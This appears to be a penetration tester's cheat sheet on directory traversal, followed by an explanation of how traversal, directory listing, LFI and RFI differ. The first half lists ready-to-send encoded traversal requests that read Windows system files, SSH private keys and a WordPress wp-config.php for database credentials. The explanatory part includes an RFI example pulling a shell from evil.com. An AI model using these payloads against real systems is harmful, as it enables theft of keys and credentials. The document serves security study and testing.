Directory Traversal

#windows_default_files

Windows files to check:

win.ini standard file

GET /theme/META-INF/prototype%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini

System.ini standard file

GET /theme/META-INF/prototype%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/System.ini

Hosts file

curl -s --path-as-is "http://10.10.10.151/blog/?lang=/windows/system32/drivers/etc/hosts"

#different_ssh_keys_names

Get ssh keys:

for id_rsa

GET /theme/META-INF/prototype%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afUsers\username\.ssh\id_rsa

for id_ecdsa

GET /theme/META-INF/prototype%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afUsers\username\.ssh\id_ecdsa

for id_ed25519

GET /theme/META-INF/prototype%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afUsers\username\.ssh\id_ed25519

Windows Wordpress config file

if we have a wordpress site and a path traversal, we can obtain the wp-config.php for database creds

http://10.10.15.11:8080/..\..\..\..\..\..\..\xampp\htdocs\blog\wp-config.php

Directory traversal vs Directory Listing vs Path traversal vs LFI vs RFI

  • Directory (or Path) traversal β€” a class of vulnerability where an attacker manipulates file-path input (for example using .. segments) so the application accesses files outside the intended directory. Often called path traversal or directory traversal (they mean the same thing).

  • Directory listing β€” a server configuration/behavior where a web server responds to a request for a directory by returning the list of files in that directory (e.g., index file missing and Options +Indexes). This is not necessarily a bug in code β€” it’s an information-exposure configuration issue.

  • LFI (Local File Inclusion) β€” a web-app vulnerability where the application includes or loads a file from the local filesystem (e.g., via include, require, file_get_contents) using user-controllable input. LFI often lets an attacker read or cause execution of local files. LFI can be caused by path traversal (user supplies ../... to reach unexpected files).

  • RFI β€” remote file inclusion: including files from remote URLs. Not in your list but useful to contrast with LFI.

Path Traversal = Directory Traversal

These terms are synonymous. Both refer to attacks where an attacker manipulates file path references (using ../ sequences) to access files outside the intended directory.

Example:

http://example.com/download?file=../../../etc/passwd

Directory Listing

A misconfiguration, not an attack. This occurs when a web server displays the contents of a directory instead of serving a default page (like index.html).

Example: Visiting http://example.com/uploads/ shows:

Index of /uploads/
- file1.pdf
- file2.jpg
- confidential.doc

This exposes file names and structure but doesn’t directly read file contents.

LFI (Local File Inclusion)

An attack where the application includes and executes a local file on the server. More severe than path traversal because the file content is processed/executed by the application.

Example:

php

include($_GET['page'] . '.php');
// Attack: ?page=../../etc/passwd

RFI (Remote File Inclusion)

Similar to LFI, but the attacker includes a file from a remote server, often containing malicious code.

Example:

php

include($_GET['page']);
// Attack: ?page=http://evil.com/shell.php

Key Relationships

VulnerabilityReads Files?Executes Code?Scope
Directory ListingNoNoShows file names
Path/Directory TraversalYesNoReads local files
LFIYesYesExecutes local files
RFIYesYesExecutes remote files

Attack Chain: Directory Listing β†’ Path Traversal β†’ LFI β†’ RFI (increasing severity)